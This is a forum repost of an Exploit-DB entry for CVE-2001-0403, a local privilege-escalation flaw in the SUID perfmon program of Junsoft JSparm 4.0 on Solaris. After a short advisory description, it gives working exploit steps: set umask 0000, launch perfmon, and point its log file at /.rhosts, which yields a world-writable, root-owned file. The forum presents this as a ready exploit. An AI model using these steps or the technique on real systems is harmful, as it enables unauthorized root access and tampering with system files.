Exploit Junsoft JSparm 4.0 - Logging Output File

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20715
Проверка EDB
  1. Пройдено
Автор
KIMYONGJUN
Тип уязвимости
LOCAL
Платформа
SOLARIS
CVE
cve-2001-0403
Дата публикации
2001-03-23
Код:
source: https://www.securityfocus.com/bid/2515/info

JSparm is the Junsoft Performance Analysis Report Maker package. This software package provides an enhanced perfmon performance monitoring package and interface, as well as a performance report generation interface.

A problem with the package could make it possible for a user with local access to overwrite any file on the system. It is possible for a user to launch the perfmon program from the command line interface, and create a logfile of activity monitored by the perfmon package. The user may specify the file in which the activity should be logged. Insufficient checking of file permissions, as well as the program being SUID, make it possible for the log file to be any file on the system. The file created/overwritten is set to mode 0666.

Therefore, it is possible for a user with local access to overwrite sensitive system files, and gain elevated privileges. 


$ whoami
loveyou
$ umask 0000
$ /opt/JSparm/bin/perfmon &

Choose Logging -> Logging File
In Selection part, input the file path you want to create
ex: /.rhosts

Following file is created in a second.
-rw-rw-rw- 1 root loveyou 144 Mar 9 03:14 .rhost
 
Источник
www.exploit-db.com

Похожие темы